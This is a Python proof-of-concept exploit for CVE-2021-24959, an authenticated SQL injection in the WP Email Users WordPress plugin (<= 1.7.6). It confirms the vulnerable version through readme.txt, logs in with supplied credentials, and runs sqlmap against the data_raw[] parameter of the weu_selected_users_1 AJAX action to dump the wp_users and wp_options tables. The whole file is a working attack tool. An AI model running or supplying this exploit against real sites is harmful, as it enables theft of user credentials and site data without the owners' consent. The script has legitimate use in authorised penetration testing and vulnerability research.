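#!/usr/bin/env python3
"""CVE-2021-24959 - WP Email Users <= 1.7.6 authenticated SQL injection (PoC driver).

Flow: probe the plugin's readme.txt to confirm it is installed and in the
vulnerable range, log into WordPress with the supplied credentials, then hand
the authenticated session cookies to sqlmap, which exploits the unescaped
``data_raw[]`` parameter of the ``weu_selected_users_1`` admin-ajax action.

Exploit script by @RandomRobbieBF
"""
import argparse
import os
import re
import shlex
import shutil
import subprocess
import sys
from getpass import getpass

import requests

# Optional outbound proxy (e.g. "http://127.0.0.1:8080" to watch traffic in
# Burp). Only exported when non-empty: an empty HTTP(S)_PROXY value is not a
# usable proxy and is best left unset.
http_proxy = ""
if http_proxy:
    os.environ['HTTP_PROXY'] = http_proxy
    os.environ['HTTPS_PROXY'] = http_proxy

# UA used for the WordPress login request.
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

# UA used for the readme probe and passed to sqlmap (kept distinct from the
# login UA, as in the original script).
probe_user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"

# First release that escapes data_raw; anything below is in scope.
FIXED_VERSION = (1, 7, 7)

# All target requests run with TLS verification disabled so the PoC works
# against lab hosts with self-signed certificates; silence the per-request
# InsecureRequestWarning so sqlmap output stays readable.
requests.packages.urllib3.disable_warnings(
    requests.packages.urllib3.exceptions.InsecureRequestWarning
)


def parse_version(version):
    """Turn a 'Stable tag' string such as '1.7.6' into a tuple of ints.

    Parsing stops at the first dot-separated component that does not start
    with digits (e.g. '1.8-beta' -> (1, 8)), so comparisons are numeric
    rather than lexical: '1.10.0' must sort above '1.7.7'.
    """
    parts = []
    for piece in version.strip().split('.'):
        match = re.match(r'\d+', piece)
        if not match:
            break
        parts.append(int(match.group()))
    return tuple(parts)


def check_plugin_version(url, username, password):
    """Fetch the plugin's readme.txt and return its 'Stable tag' version.

    Exits when the plugin is absent, the readme is unreadable, the version
    line is missing, or the version is already patched (>= 1.7.7).
    username/password are unused but kept for the original call signature.
    """
    headers = {'User-Agent': probe_user_agent}
    plugin_url = url + "/wp-content/plugins/wp-email-users/readme.txt"
    try:
        response = requests.get(plugin_url, headers=headers, verify=False, timeout=30)
    except requests.exceptions.RequestException as e:
        print(f"Request failed with an error: {e}")
        sys.exit(1)

    if response.status_code != 200:
        print("Plugin not installed")
        sys.exit(1)

    version_line = next(
        (line for line in response.text.splitlines() if line.startswith('Stable tag:')),
        None,
    )
    if not version_line:
        print("Failed to find the version information in the readme.txt file.")
        sys.exit(1)

    version = version_line.split(':', 1)[1].strip()
    # Numeric comparison: the original compared strings, which sorted '1.10'
    # below '1.7.7' and reported exactly '1.7.7' as vulnerable.
    if parse_version(version) >= FIXED_VERSION:
        print("The plugin version is 1.7.7 or above.")
        sys.exit()
    print("The plugin version is below 1.7.7.")
    print("The plugin version is " + version)
    return version


def vulncheck(url, username, password):
    """Log in as the given user and run sqlmap against the vulnerable AJAX action.

    The injection is only reachable by an authenticated user, so the
    wordpress_logged_in_* cookies obtained at login are forwarded to sqlmap.
    Exits non-zero when the login request fails, the login is rejected, or
    sqlmap cannot be located or started.
    """
    print("Vulnerability check:", url)

    login_url = f"{url}/wp-login.php"
    session = requests.Session()
    login_data = {
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": f"{url}/wp-admin/",
    }
    try:
        login_response = session.post(
            login_url,
            data=login_data,
            headers={"User-Agent": user_agent},
            verify=False,
            timeout=30,
        )
        login_response.raise_for_status()
    except requests.exceptions.RequestException as e:
        print(f"Request failed with an error: {e}")
        sys.exit(1)

    # WordPress only sets wordpress_logged_in_* on a successful login; a bad
    # password still returns 200, so the status code alone proves nothing.
    if not any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        print("Failed to log in.")
        sys.exit(1)
    print("Logged in successfully.")
    cookie_string = "; ".join(f"{name}={value}" for name, value in session.cookies.items())

    sqlmap = shutil.which("sqlmap.py") or shutil.which("sqlmap")
    if sqlmap is None:
        print("sqlmap.py not found in PATH.")
        sys.exit(1)

    # Argument list with shell=False: the URL comes from the command line and
    # the cookie values from the target's Set-Cookie headers, so building a
    # shell string (as the original did) let a hostile target inject commands
    # into the operator's shell via a crafted cookie value.
    command = [
        sqlmap,
        "-u", f"{url}/wp-admin/admin-ajax.php",
        "--data=data_raw%5B%5D=&action=weu_selected_users_1",
        "--time-sec=10",
        "--threads", "4",
        "--batch",
        "-p", "data_raw[]",
        "-T", "wp_users,wp_options",
        "--dump",
        f"--referer={url}/wp-admin/",
        "--level", "3",
        "--risk", "3",
        "--technique=BT",
        "--dbms=mysql",
        f"--user-agent={probe_user_agent}",
        "--cookie", cookie_string,
    ]
    print("Command Line: " + shlex.join(command))

    try:
        process = subprocess.Popen(
            command,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
            universal_newlines=True,
        )
    except OSError as e:
        # Popen never raises CalledProcessError (which the original caught);
        # a missing or non-executable sqlmap surfaces as OSError here.
        print(f"Failed to start sqlmap: {e}")
        sys.exit(1)

    # The context manager closes stdout and waits for exit once output ends.
    with process:
        for line in process.stdout:
            print(line.rstrip())
    if process.returncode != 0:
        print(f"Command execution failed with error code {process.returncode}.")


DESCRIPTION = """
WP Email Users <= 1.7.6 - SQL Injection

Description:
CVE-2021-24959
The WP Email Users WordPress plugin through 1.7.6 does not escape the data_raw parameter in the weu_selected_users_1 AJAX action, available to any authenticated users, allowing them to perform SQL injection attacks.
"""


def main():
    """Parse the command line, prompt for missing credentials, run the checks."""
    parser = argparse.ArgumentParser(
        description=DESCRIPTION,
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument("-u", "--url", help="Website URL", required=True)
    parser.add_argument("-un", "--username", help="WordPress username")
    # Passing -p on the command line exposes the password to `ps` and shell
    # history; omit it and the script prompts without echo instead.
    parser.add_argument("-p", "--password", help="WordPress password")
    args = parser.parse_args()

    # Paths are appended with a leading '/', so drop a trailing one to avoid
    # '//wp-login.php' style URLs.
    url = args.url.rstrip('/')
    if not args.username:
        args.username = input("Enter the WordPress username: ")
    if not args.password:
        args.password = getpass("Enter the WordPress password: ")

    check_plugin_version(url, args.username, args.password)
    vulncheck(url, args.username, args.password)


if __name__ == "__main__":
    main()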